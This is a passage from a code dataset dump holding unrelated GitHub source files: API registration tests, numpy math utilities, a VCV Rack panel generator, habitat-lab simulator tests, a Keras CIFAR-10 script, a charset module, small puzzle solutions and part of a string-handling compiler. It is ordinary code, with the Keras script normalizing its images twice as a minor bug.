checks user creation with invalid email w/o @ symbol.\")\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.severity(allure.severity_level.CRITICAL)\r\n def test_create_user_with_invalid_email(self):\r\n data = self.prepare_registration_data()\r\n\r\n data[\"email\"] = data[\"email\"].replace(\"@\", \"\")\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"Invalid email format\")\r\n\r\n @allure.description(\"This test checks user creation when one field is missing.\")\r\n @allure.severity(allure.severity_level.MINOR)\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @allure.title(\"Attempt to create a user with missing field: {missing_field}\")\r\n @pytest.mark.parametrize(\"missing_field\", missing_fields)\r\n def test_create_user_with_one_field_missing(self, missing_field):\r\n data = self.prepare_registration_data()\r\n\r\n data.pop(missing_field)\r\n\r\n response = MyRequests.post(\"/user\", data=data)\r\n\r\n Assertions.assert_code_status(response, 400)\r\n Assertions.assert_decoded_content(response, f\"The following required params are missed: {missing_field}\")\r\n\r\n @allure.title(\"Register with parametrized name with length: {length}\")\r\n @allure.description(\"This test checks user creation with invalid name lengths.\")\r\n @allure.severity(allure.severity_level.TRIVIAL)\r\n @allure.label(\"Positive/Negative\", 'Negative')\r\n @pytest.mark.parametrize(\"length\", lengths)\r\n @pytest.mark.parametrize(\"name\", names)\r\n 
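# note: the two parametrize decorators combine, so this test runs once per\r\n    # (name, length) pair - with the lists above that is 1 name x 2 lengths\r\n    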
def test_name_fields_lengths_while_user_creation(self, length, name):\r\n        data = self.prepare_registration_data()\r\n\r\n        source_for_name = string.ascii_letters + string.digits\r\n        rand_name = \"\".join(choices(source_for_name, k=length))\r\n\r\n        data[name] = rand_name\r\n\r\n        # use the relative path like the other tests; MyRequests prepends the base URL\r\n        response = MyRequests.post(\"/user\", data=data)\r\n\r\n        if length < 2:\r\n            Assertions.assert_code_status(response, 400)\r\n            Assertions.assert_decoded_content(response, f\"The value of '{name}' field is too short\")\r\n\r\n        if length > 250:\r\n            Assertions.assert_code_status(response, 400)\r\n            Assertions.assert_decoded_content(response, f\"The value of '{name}' field is too long\")\r\n","repo_name":"taskri/LearnQA_PythonAPI","sub_path":"tests/test_user_register.py","file_name":"test_user_register.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"12758063706","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\ndef get_angle(v, w, radians=False):\n    \"\"\"\n    Calculates angle between two vectors\n\n    Parameters\n    ----------\n    v : np.ndarray\n        First vector.\n    w : np.ndarray\n        Second vector.\n    radians : bool, optional\n        To return the result in radians or degrees. The default is False.\n\n    Returns\n    -------\n    float\n        Angle between v and w.\n\n    \"\"\"\n\n    if np.linalg.norm(v) == 0 or np.linalg.norm(w) == 0 or np.all(v == w):\n        return 0\n    cosine = np.dot(v, w) / (np.linalg.norm(v) * np.linalg.norm(w))\n\n    if radians:\n        return np.arccos(cosine)\n    else:\n        return np.rad2deg(np.arccos(cosine))\n\n\n\ndef fft_interpolate(function, interpolation_factor=2, axis=None):\n    \"\"\"\n    This method will interpolate using a Fast-Fourier Transform\n    \n    if I = interpolation_factor\n    This function will receive f(x,y,z) with dimensions of (nx,ny,nz)\n    and returns f(x,y,z) with dimensions of (nx*I,ny*I,nz*I)\n\n    Parameters\n    ----------\n    function : np.ndarray\n        The values array to do the interpolation on.\n    interpolation_factor : int, optional\n        Interpolation Factor, by default 2\n\n    Returns\n    -------\n    np.ndarray\n        The interpolated points\n    \"\"\"\n\n    if axis is None:\n        axis = np.arange(function.ndim)\n    if type(axis) is int:\n        axis = [axis]\n    function = np.array(function)\n    eigen_fft = np.fft.fftn(function)\n    shifted_fft = np.fft.fftshift(eigen_fft)\n    pad_width = []\n    factor = 0\n    for idim in range(function.ndim):\n        if idim in axis:\n            n = shifted_fft.shape[idim]\n            pad = n * (interpolation_factor - 1) // 2\n            factor += 1\n        else:\n            pad = 0\n        pad_width.append([pad, pad])\n    new_matrix = np.pad(shifted_fft, pad_width, \"constant\", constant_values=0)\n    new_matrix = np.fft.ifftshift(new_matrix)\n    # zero-padding each chosen axis rescales ifftn's 1/N normalization by the\n    # interpolation factor, so the amplitude correction is one power per padded axis\n    if \"complex\" in function.dtype.name:\n        interpolated = np.fft.ifftn(new_matrix) * interpolation_factor ** factor\n    else:\n        interpolated = np.real(np.fft.ifftn(new_matrix)) * (\n            interpolation_factor ** factor\n        )\n    return interpolated\n\ndef change_of_basis(tensor,A,B):\n    \"\"\"changes the basis of a tensor given the column vectors of A and B\n\n    This changes the basis from B to A. 
The tensor has to be in the A basis.\n\n Parameters\n ----------\n tensor : np.ndarray\n Rank 1 or rank 2 tensor\n A : np.ndarray\n column vectors of the A basis\n B : np.ndarray\n column vectors of the B basis\n \"\"\"\n transform = np.linalg.inv(B).dot(A)\n n_dim = len(tensor.shape)\n if n_dim == 1:\n tensor_b = transform.dot(tensor)\n else:\n transform_inv = np.linalg.inv(transform)\n tensor_b = transform_inv.dot(tensor).dot(transform)\n # tensor_b = transform.dot(tensor).dot(transform_inv)\n return tensor_b\n","repo_name":"romerogroup/pyprocar","sub_path":"pyprocar/utils/mathematics.py","file_name":"mathematics.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"63"} +{"seq_id":"31631119775","text":"import math\nimport os\nimport platform\nimport sys\n\nfrom ..detail.panel import Panel as detailPanel\n\nif platform.system () == 'Windows' and sys.version_info >= (3, 8):\n # Starting from 3.8, Python no longer searches for DLLs in PATH\n os.add_dll_directory (r\"C:\\msys64\\mingw64\\bin\")\nimport cairocffi\n\n\n\nMM_TO_PT = 72.0 / 25.4\nMODULE_HEIGHT = 128.5#mm\n\n\n\nclass Panel:\n\n #--------------------------------------------------------------------------\n\n def generate (self, path, root):\n for module in root.modules:\n self.generate_module (path, module)\n\n\n #--------------------------------------------------------------------------\n\n def generate_module (self, path, module):\n path_svg_pp = os.path.join (path, 'panel_vcvrack-preprocess.svg')\n path_svg = os.path.join (path, 'panel_vcvrack.svg')\n\n surface = cairocffi.SVGSurface (path_svg_pp, module.width.pt, MODULE_HEIGHT * MM_TO_PT)\n surface.set_document_unit (cairocffi.SVG_UNIT_PT)\n context = cairocffi.Context (surface)\n\n panel = detailPanel ()\n panel.generate_module (context, module, simulated=True)\n\n surface.finish ()\n\n self.post_process (path_svg_pp, path_svg)\n\n\n #--------------------------------------------------------------------------\n # VCV Rack doesn't interpret properly rgb() color style.\n # Post-process the file to solve that problem.\n\n def post_process (self, path_svg_pp, path_svg):\n with open (path_svg_pp, 'r', encoding='utf-8') as file_pp:\n with open (path_svg, 'w', encoding='utf-8') as file:\n for line in file_pp:\n line = self.post_process_line (line)\n file.write (line)\n\n\n #--------------------------------------------------------------------------\n # Note: fragile parser\n\n def post_process_line (self, line):\n def percent_to_hex (ps):\n s = ps [:-1]\n f = float (s) * 2.55\n i = int (f)\n return '%0.2x' % i\n\n while 'rgb(' in line:\n start = line.find ('rgb(')\n end = line.find (')')\n sub = line [start+4:end]\n arr = sub.split (',')\n color_hex = '#' + ''.join (map (lambda s: percent_to_hex (s), arr))\n line = line.replace (line [start:end+1], color_hex)\n\n return line\n","repo_name":"ricardomatias/eurorack-blocks","sub_path":"build-system/erbui/generators/vcvrack/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"29822896448","text":"import os.path as osp\n\nimport magnum as mn\nimport pytest\n\nfrom habitat.sims.habitat_simulator.sim_utilities import (\n bb_ray_prescreen,\n snap_down,\n)\nfrom habitat_sim import Simulator, built_with_bullet\nfrom habitat_sim.metadata import MetadataMediator\nfrom habitat_sim.physics import MotionType\nfrom habitat_sim.utils.settings 
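# A quick sanity check for the mathematics helpers above (illustrative, not
# part of the module). With A the standard basis and B the same basis scaled
# by 2, coordinates expressed in A halve when re-expressed in B:
import numpy as np

A = np.eye(3)                  # column vectors of basis A
B = 2 * np.eye(3)              # column vectors of basis B
v = np.array([2.0, 4.0, 6.0])  # rank-1 tensor given in the A basis
# change_of_basis(v, A, B) computes inv(B) @ A @ v -> array([1., 2., 3.])
# get_angle([1, 0], [0, 1]) -> 90.0 (degrees by default)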
import default_sim_settings, make_cfg\n\n\n@pytest.mark.skipif(\n not built_with_bullet,\n reason=\"ArticulatedObject API requires Bullet physics.\",\n)\n@pytest.mark.skipif(\n not osp.exists(\"data/test_assets/scenes/plane.glb\"),\n reason=\"Requires the plane.glb habitat test asset\",\n)\n@pytest.mark.parametrize(\n \"support_margin\",\n [0.0, 0.04, 0.1],\n)\n@pytest.mark.parametrize(\"obj_margin\", [0.0, 0.04, 0.1])\n@pytest.mark.parametrize(\"stage_support\", [True, False])\ndef test_snap_down(support_margin, obj_margin, stage_support):\n \"\"\"\n Test snapping objects onto stages and other assets.\n \"\"\"\n\n mm = MetadataMediator()\n\n otm = mm.object_template_manager\n stm = mm.stage_template_manager\n\n # prepare the support object depending on 'stage_support' mode. Either a STATIC object or a stage mesh.\n cube_template_handle = otm.get_template_handles(\"cubeSolid\")[0]\n cube_stage_template_handle = \"cube_stage_object\"\n plane_stage_template_handle = \"plane_stage\"\n if not stage_support:\n # setup a cube ground plane object config\n cube_template = otm.get_template_by_handle(cube_template_handle)\n cube_template.scale = mn.Vector3(10, 0.05, 10)\n cube_template.margin = support_margin\n otm.register_template(cube_template, cube_stage_template_handle)\n else:\n # setup a stage using the plane.glb test asset\n new_stage_template = stm.create_new_template(\n handle=plane_stage_template_handle\n )\n new_stage_template.render_asset_handle = (\n \"data/test_assets/scenes/plane.glb\"\n )\n new_stage_template.margin = support_margin\n new_stage_template.orient_up = mn.Vector3(0, 0, 1)\n new_stage_template.orient_front = mn.Vector3(0, 1, 0)\n # need to make the scale reasonable or navmesh takes forever to recompute\n # BUG: this scale is not used by sim currently...\n new_stage_template.scale = mn.Vector3(0.01, 1.0, 0.01)\n # temporary hack: load and arbitrary navmesh, we don't use it anyway\n new_stage_template.navmesh_asset_handle = (\n \"data/test_assets/scenes/simple_room.stage_config.navmesh\"\n )\n stm.register_template(\n template=new_stage_template,\n specified_handle=plane_stage_template_handle,\n )\n\n # setup test cube object config\n cube_template = otm.get_template_by_handle(cube_template_handle)\n cube_template.margin = obj_margin\n otm.register_template(cube_template)\n\n # Test snapping a cube object onto another object\n sim_settings = default_sim_settings.copy()\n sim_settings[\"sensor_height\"] = 0\n sim_settings[\"scene\"] = \"NONE\"\n if stage_support:\n sim_settings[\"scene\"] = plane_stage_template_handle\n hab_cfg = make_cfg(sim_settings)\n hab_cfg.metadata_mediator = mm\n with Simulator(hab_cfg) as sim:\n rom = sim.get_rigid_object_manager()\n\n # add the cube objects\n cube_stage_obj = None\n support_obj_ids = [-1]\n if not stage_support:\n cube_stage_obj = rom.add_object_by_template_handle(\n cube_stage_template_handle\n )\n assert (\n cube_stage_obj.is_alive\n ), \"Failure to add object may indicate configuration issue or no 'cube_stage_template_handle'.\"\n support_obj_ids = [cube_stage_obj.object_id]\n cube_obj = rom.add_object_by_template_handle(cube_template_handle)\n assert cube_obj.is_alive\n\n # test with various combinations of motion type for both objects\n for object_motion_type in [MotionType.KINEMATIC, MotionType.DYNAMIC]:\n for support_motion_type in [\n MotionType.STATIC,\n MotionType.KINEMATIC,\n MotionType.DYNAMIC,\n ]:\n if not stage_support:\n cube_stage_obj.motion_type = support_motion_type\n cube_obj.motion_type = object_motion_type\n\n 
# snap will fail because object COM is inside the support surface shape so raycast won't detect the support surface\n initial_translation = mn.Vector3(0, 0, 0.1)\n cube_obj.translation = initial_translation\n snap_success = snap_down(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert not snap_success\n assert (\n initial_translation - cube_obj.translation\n ).length() < 1e-5, (\n \"Translation should not be changed after snap failure.\"\n )\n bb_ray_prescreen_results = bb_ray_prescreen(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert bb_ray_prescreen_results[\"surface_snap_point\"] is None\n\n # with object above the support, snap will succeed.\n cube_obj.translation = mn.Vector3(0, 0.2, 0)\n snap_success = snap_down(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert snap_success\n bb_ray_prescreen_results = bb_ray_prescreen(\n sim, cube_obj, support_obj_ids=support_obj_ids\n )\n assert (\n cube_obj.translation\n - bb_ray_prescreen_results[\"surface_snap_point\"]\n ).length() < 1e-5, (\n \"Translation should be the pre-screened location.\"\n )\n assert (\n bb_ray_prescreen_results[\"surface_snap_point\"] is not None\n )\n if stage_support:\n # don't need 3 iterations for stage b/c no motion types to test\n break\n","repo_name":"facebookresearch/habitat-lab","sub_path":"test/test_sim_utils.py","file_name":"test_sim_utils.py","file_ext":"py","file_size_in_byte":6139,"program_lang":"python","lang":"en","doc_type":"code","stars":1467,"dataset":"github-code","pt":"62"} +{"seq_id":"8228464055","text":"# Importing the Keras libraries and packages\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import MaxPooling2D\r\nfrom keras.layers import Flatten,Dropout\r\nfrom keras.layers import Dense\r\nfrom keras.datasets import cifar10\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import np_utils\r\n\r\nimg_size = 32\r\nimg_channels = 3\r\nnb_classes = 10\r\n# length of the image after we flatten the image into a 1-D array\r\nimg_size_flat = img_size * img_size * img_channels\r\nnb_files_train = 5\r\nimages_per_file = 10000 \r\n# number of all the images in the training dataset\r\nnb_images_train = nb_files_train * images_per_file\r\nepochs=25\r\n\r\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\r\ny_train = np_utils.to_categorical(y_train, nb_classes)\r\ny_test = np_utils.to_categorical(y_test, nb_classes)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(filters=64,\r\n kernel_size=(3, 3),\r\n activation='relu',\r\n kernel_initializer='he_normal',\r\n input_shape=(32, 32, 3)))\r\nmodel.add(MaxPooling2D((2, 2)))\r\nmodel.add(Conv2D(filters=256,\r\n kernel_size=(2, 2),\r\n kernel_initializer='he_normal',\r\n activation='relu'))\r\nmodel.add(MaxPooling2D((2, 2)))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1024, activation='relu'))\r\nmodel.add(Dropout(0.4))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\n\r\nhistory=model.fit(x_train, y_train,\r\n batch_size=32,\r\n epochs=18,\r\n verbose=1,\r\n validation_data=(x_test, y_test))\r\nimport numpy as np\r\nloss, accuracy = model.evaluate(x_test, y_test)\r\nresult = model.predict(x_test)\r\npredicted_class = np.argmax(result, 
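# For orientation: the parametrize stack on test_snap_down above expands to
# 3 support margins x 3 object margins x 2 support modes = 18 test cases.
# A typical way to run just this test (invocation is illustrative):
#   python -m pytest -k test_snap_down test/test_sim_utils.py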
axis=1)\r\ntrue_class = np.argmax(y_test, axis=1)\r\nnum_correct = np.sum(predicted_class == true_class) \r\naccuracy = float(num_correct)/result.shape[0]\r\n\r\nplt.plot(history.history['acc'])\r\nplt.plot(history.history['val_acc'])\r\nplt.title('model accuracy')\r\nplt.ylabel('accuracy')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()\r\n# summarize history for loss\r\nplt.plot(history.history['loss'])\r\nplt.plot(history.history['val_loss'])\r\nplt.title('model loss')\r\nplt.ylabel('loss')\r\nplt.xlabel('epoch')\r\nplt.legend(['train', 'test'], loc='upper left')\r\nplt.show()","repo_name":"prathyushreddy1/ImageClassification","sub_path":"ImageClassify.py","file_name":"ImageClassify.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31241330833","text":"import string\n\n\nclass CharsetError(Exception):\n pass\n\n\nCHARSETS = {\n \"a\": string.ascii_lowercase,\n \"A\": string.ascii_uppercase,\n \"1\": string.digits,\n \"!\": string.punctuation,\n \"*\": string.printable,\n}\n\nPREDEFINED_CHARSETS = {\n \"base32\": CHARSETS[\"A\"] + \"234567=\",\n \"base64\": CHARSETS[\"a\"] + CHARSETS[\"A\"] + CHARSETS[\"1\"] + \"/+=\",\n \"printable\": CHARSETS[\"*\"],\n}\n\n\ndef get_charset(charset):\n charset = charset or \"printable\"\n if charset in PREDEFINED_CHARSETS:\n return PREDEFINED_CHARSETS[charset].encode(\"ascii\")\n try:\n _ = b\"\"\n for c in set(charset):\n _ += CHARSETS[c].encode(\"ascii\")\n return _\n except KeyError:\n raise CharsetError(\"Bad character set: \", charset)\n","repo_name":"hellman/xortool","sub_path":"xortool/charset.py","file_name":"charset.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1296,"dataset":"github-code","pt":"62"} +{"seq_id":"41498672053","text":"# 문제\n# 오늘은 2007년 1월 1일 월요일이다. 그렇다면 2007년 x월 y일은 무슨 요일일까? 이를 알아내는 프로그램을 작성하시오.\n\n# 입력\n# 첫째 줄에 빈 칸을 사이에 두고 x(1 ≤ x ≤ 12)와 y(1 ≤ y ≤ 31)이 주어진다. 
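# Note on the CIFAR-10 script above: a small preprocessing helper (sketch,
# not from the original file) that casts and scales pixel values to [0, 1]
# exactly once; scaling the same array twice would shrink inputs to
# [0, 1/255] and hurt training.
def prepare_images(x):
    # Safe to call once on the raw uint8 arrays returned by cifar10.load_data().
    return x.astype("float32") / 255.0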
참고로 2007년에는 1, 3, 5, 7, 8, 10, 12월은 31일까지, 4, 6, 9, 11월은 30일까지, 2월은 28일까지 있다.\n\n# 출력\n# 첫째 줄에 x월 y일이 무슨 요일인지에 따라 SUN, MON, TUE, WED, THU, FRI, SAT중 하나를 출력한다.\n\n# 예제 입력 1 \n# 1 1\n# 예제 출력 1 \n# MON\n\n# 예제 입력 2 \n# 3 14\n# 예제 출력 2 \n# WED\n\n# 예제 입력 3 \n# 9 2\n# 예제 출력 3 \n# SUN\n\n# day=0 >>임의의 값\n# arrlist=[31,28,31,30,31,30,31,31,30,31,30,31] >>월에 맞는 일 수\n# weekday=[\"SUN\",\"MON\",\"TUE\",\"WED\",\"THU\",\"FRI\",\"SAT\"] >>요일에 맞는 날짜\n# x,y=map(int,(input()).split()) >>x y 값 받고\n# for i in range (x-1): >>반복문 돌려서\n# day=day+arrlist[i] >> 일 수를 다 day 에 더해줌\n# day=(day+y)%7 >> day 에 y 더해서 7로 나눈 나머지\n# print(weekday[day]) >> 요일리스트에서 인덱싱으로 찾음\n\n \nm,d=map(int,input().split())\nmlist=(31,28,31,30,31,30,31,31,30,31,30,31)\nweekday=(\"SUN\",\"MON\",\"TUE\",\"WED\",\"THU\",\"FRI\",\"SAT\")\nmaddtotal=0\nfor i in range(0,m-1):\n maddtotal+=mlist[i]\nprint(weekday[(maddtotal+d)%7])\n","repo_name":"gsandoo/BOJ","sub_path":"mathmatics/1924.py","file_name":"1924.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"43223142282","text":"# coding: utf-8\n\n\"\"\"\nDemonstrates how to use modifiers.\n\nNumber of modifiers are already defined in ``crappy.modifiers``, but it can\nalso be a function or any class containing the ``.evaluate()`` method.\n\nNo hardware required.\n\"\"\"\n\nimport crappy\n\n\n# Example of class used as a Modifier\nclass My_offset_modifier:\n def __init__(self, offset):\n self.offset = offset\n\n def evaluate(self, data):\n \"\"\"Method returning the modified values.\n\n Remember: data is ALWAYS a :obj:`dict`.\n Returning :obj:`None` will drop the data.\n \"\"\"\n\n for k in data:\n if k != 't(s)': # Move everything except the time\n data[k] += self.offset\n return data # Do not forget to return it!\n\n\n# Example of function used as a modifier\ndef mul_by_10(data):\n data['cmd'] *= 10\n return data\n\n\nif __name__ == \"__main__\":\n generator = crappy.blocks.Generator(path=[\n {'type': 'constant', 'value': 0, 'condition': 'delay=2'},\n {'type': 'constant', 'value': 1, 'condition': 'delay=2'}\n ] * 20, spam=True)\n graph = crappy.blocks.Grapher(('t(s)', 'cmd'))\n smooth_graph = crappy.blocks.Grapher(('t(s)', 'cmd'))\n\n crappy.link(generator, graph)\n # We add a moving average to smooth the data\n # and our custom condition that adds and offset of 5\n crappy.link(generator, smooth_graph,\n # The modifiers will be applied in the order of the list\n modifier=[\n # Integrated modifier, will average the values on 100 points\n crappy.modifier.Moving_avg(100),\n # Will add an offset\n My_offset_modifier(5),\n # Will multiply the result by 10\n mul_by_10])\n\n # This block will simply print \"Triggered\" followed by the received data\n r = crappy.blocks.Reader('Triggered')\n\n # Only forward data when the label \"cycle\" changed its value\n crappy.link(generator, r,\n modifier=crappy.modifier.Trig_on_change('cycle'))\n\n crappy.start()\n","repo_name":"LaboratoireMecaniqueLille/crappy","sub_path":"Examples/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"62"} +{"seq_id":"24795402190","text":"# determines if an integer is palindromic via recursion\ndef is_palindrome(x):\n x = str(x)\n if len(x) <= 1:\n return True\n if int(x) < 0:\n return False\n else:\n first = x[0:1]\n last = x[-1] # horrid performance\n rest = x[1:]\n if first not in rest:\n return False\n 
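# Cross-check for the BOJ 1924 weekday solution above using the standard
# library (fine for a local sanity test; the submitted code computes the
# offset manually, as shown):
#   import datetime
#   datetime.date(2007, m, d).strftime('%a').upper()[:3]
# e.g. date(2007, 3, 14) -> 'WED', matching the expected output.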
else:\r\n            return (first == last) and is_palindrome(x[1:-1])\r\n","repo_name":"bravo-c/InterviewQuestionsAnswered","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"}
{"seq_id":"18376532097","text":"# -*- coding: utf-8 -*-\n\nfrom ..Helpers.types import Types\nfrom ..Helpers.base import dbstore, dbload\nfrom ..Helpers.loop import Loop\nfrom ..Helpers.commands import Dup, Store, Push, Mul, DMalloc, Load, Compare, DBStore, Add, DBLoad, Jnz, Label, Jump, Jz, Sub\n\n\nclass StringCompiler:\n    @staticmethod\n    def store(commands, data):\n        \"\"\" Generate instructions for writing a string from the stack into heap memory. \"\"\"\n        str_start_pointer = data.var(Types.INT)\n        end_str_pointer = data.var(Types.INT)\n\n        # Add 1 to the required memory size - for the escape zero (the end-of-string marker)\n        commands.add(Push, 1)\n        commands.add(Add)\n        commands.add(Dup)\n        # Allocate memory of size = the number on the stack (we stored the string length there earlier)\n        commands.add(DMalloc, 0)\n        commands.add(Dup)\n        commands.add(Store, str_start_pointer)\n        # Hoist the loop invariant - the pointer to the end of the string - into a variable\n        commands.add(Add)\n        commands.add(Store, end_str_pointer)\n\n        def cycle_body(_counter, b, c):\n            # Store all the characters in the allocated memory one by one in reverse order (since we take them off the stack)\n            dbstore(end_str_pointer, _counter, commands, invert=True, value=-2)\n\n        counter = Loop.stack(commands, data, cycle_body, load_counter=False, return_counter=True)\n\n        # Write 0 into the last memory cell - this is the end-of-string marker\n        commands.add(Push, 0)\n        dbstore(str_start_pointer, counter, commands)\n\n        # Push the pointer to the start of the string onto the stack for further use\n        commands.add(Load, str_start_pointer)\n\n    @staticmethod\n    def strlen(commands, data, type):\n        \"\"\" Generate instructions for getting the length of the string currently on the stack. \"\"\"\n        str_start_pointer = data.var(Types.INT)\n        # Dereference the pointer lying on the stack and write it into a variable\n        commands.add(Store, str_start_pointer)\n\n        # Read the string from memory to its end (until we hit 0), counting the characters (the count is pushed onto the stack)\n        Loop.data(commands, data, str_start_pointer, memory_type='heap')\n
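# A compact alternative to the recursive palindrome check from the snippet
# above (illustrative only, not part of either file): slicing reverses the
# string in one step and handles the negative case up front.
#   def is_palindrome(x):
#       s = str(x)
#       return not s.startswith('-') and s == s[::-1]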
\n    @staticmethod\n    def strget(commands, data, type):\n        \"\"\" Generate instructions for getting a particular character of a string \"\"\"\n        # Add the index (offset) of the requested character to the cell number of the string start\n        commands.add(Add)\n        # Load the character onto the stack by its cell number in heap memory\n        commands.add(DBLoad, 0)\n\n    @staticmethod\n    def strset(commands, data, type):\n        \"\"\" Generate instructions for replacing a particular character of a string \"\"\"\n        # Compute the heap memory cell where the character to replace is located\n        commands.add(Add)\n        # Perform the character replacement\n        commands.add(DBStore, 0)\n\n    @staticmethod\n    def strsub(commands, data, type):\n        \"\"\" Generate instructions for getting a substring of a string \"\"\"\n        substr_length = data.var(Types.INT)\n        substr_start_pointer = data.var(Types.INT)\n\n        finish_label = data.label()\n\n        # Save the substring length\n        commands.add(Store, substr_length)\n\n        commands.add(Add)\n        commands.add(Store, substr_start_pointer)\n\n        # Push 0 onto the stack - the end-of-string marker\n        commands.add(Push, 0)\n\n        def cycle_body(_counter, a, b):\n            commands.add(Load, _counter)\n            commands.add(Load, substr_length)\n            commands.add(Compare, 5)\n            # If a substring of the required length has already been read and written - exit the loop\n            commands.add(Jnz, finish_label)\n            # Load the next character of the substring from heap memory\n            dbload(substr_start_pointer, _counter, commands)\n\n        Loop.data(commands, data, substr_start_pointer, cycle_body, load_counter=False, memory_type='heap')\n\n        commands.add(Label, finish_label)\n        # Push the substring length + 1 onto the stack (for the end-of-string marker - zero)\n        commands.add(Load, substr_length)\n\n        StringCompiler.store(commands, data)\n\n    @staticmethod\n    def strdup(commands, data, type):\n        \"\"\" Generate instructions for duplicating a string \"\"\"\n        str_start_pointer = data.var(Types.INT)\n\n        # Dereference the pointer lying on the stack and write it into a variable\n        commands.add(Store, str_start_pointer)\n\n        # Push 0 onto the stack - the end-of-string marker\n        commands.add(Push, 0)\n\n        def cycle_body(_counter, a, b):\n            dbload(str_start_pointer, _counter, commands)\n\n        # Read the string and push it onto the stack\n        Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n        StringCompiler.store(commands, data)\n\n    @staticmethod\n    def strcat_first(commands, data, type):\n        \"\"\" Generate instructions for duplicating the first of the strings being concatenated \"\"\"\n        str_start_pointer = data.var(Types.INT)\n\n        commands.add(Store, str_start_pointer)\n        commands.add(Push, 0)\n\n        def cycle_body(_counter, a, b):\n            dbload(str_start_pointer, _counter, commands)\n\n        # Read the string and push it onto the stack\n        Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n    @staticmethod\n    def strcat_second(commands, data, type):\n        \"\"\" Generate instructions for duplicating the second of the strings being concatenated and writing it in memory right after the first \"\"\"\n        str_start_pointer = data.var(Types.INT)\n        str_length = data.var(Types.INT)\n\n        commands.add(Store, str_start_pointer)\n        commands.add(Store, str_length)\n\n        def cycle_body(_counter, a, b):\n            dbload(str_start_pointer, _counter, commands)\n\n        # Read the string and push it onto the stack\n        Loop.data(commands, data, str_start_pointer, cycle_body, memory_type='heap')\n\n        commands.add(Load, str_length)\n        commands.add(Add)\n\n        StringCompiler.store(commands, data)\n\n    @staticmethod\n    def strmake(commands, data):\n        \"\"\" Generate instructions for creating a string of a given length filled with a repeated character \"\"\"\n        str_start_pointer = data.var(Types.INT)\n        str_length = data.var(Types.INT)\n        basis_symbol = data.var(Types.CHAR)\n\n        finish_label = data.label()\n\n        commands.add(Dup)\n        # Save the string length into a variable\n        commands.add(Store, str_length)\n        # Allocate memory = the given string length + 1 (plus the end-of-string marker - 0)\n        commands.add(DMalloc, 1)\n        commands.add(Store, str_start_pointer)\n        commands.add(Store, basis_symbol)\n\n        def cycle_body(_counter, b, c):\n            commands.add(Load, _counter)\n            commands.add(Load, str_length)\n            commands.add(Compare, 5)\n            commands.add(Jnz, finish_label)\n            commands.add(Load, basis_symbol)\n            dbstore(str_start_pointer, _counter, commands)\n\n        counter = Loop.simple(commands, data, cycle_body, return_counter=True)\n\n        # We jump here once the required number of characters has been written into the new string\n        commands.add(Label, finish_label)\n\n        # Write 0 into the last memory cell - this is the end-of-string marker\n        commands.add(Push, 0)\n        dbstore(str_start_pointer, counter, commands)\n\n        # Push the pointer to the start of the created string onto the stack for further use\n        commands.add(Load, str_start_pointer)\n\n    @staticmethod\n    def strcmp(commands, data, type1, type2):\n        \"\"\" Generate instructions for character-by-character comparison of two strings \"\"\"\n        str1_start_pointer = data.var(Types.INT)\n        str2_start_pointer = data.var(Types.INT)\n\n        eq_label = data.label()\n        not_eq_label = data.label()\n        finish_label = data.label()\n\n        commands.add(Store, str1_start_pointer)\n        commands.add(Store, str2_start_pointer)\n\n        def cycle_body(_counter, a, continue_label):\n            # Load the n-th character of string 1\n            dbload(str1_start_pointer, _counter, commands)\n            # Duplicate it on the stack for a later check (so we don't have to load it again)\n            commands.add(Dup)\n            # Load the n-th character of string 2\n            dbload(str2_start_pointer, _counter, commands)\n            commands.add(Compare, 1)\n            # If the characters are not equal, jump straight to the not_eq_label section and figure out there which one is greater\n            # This also works when the end of one of the strings has been reached (some character vs 0)\n            commands.add(Jnz, not_eq_label)\n\n            commands.add(Push, 0)\n            # Compare the previously duplicated character (of string 1) with 0 - if it equals zero, so does the second one,\n            # since this section is only reached when both characters are equal\n            commands.add(Compare, 0)\n            # 0 means the end of the string was reached - if it is not 0, continue the loop\n            commands.add(Jz, continue_label)\n            # We get here when the ends of both strings were reached at once - i.e. they are fully equal\n            commands.add(Jump, eq_label)\n\n        counter = Loop.simple(commands, data, 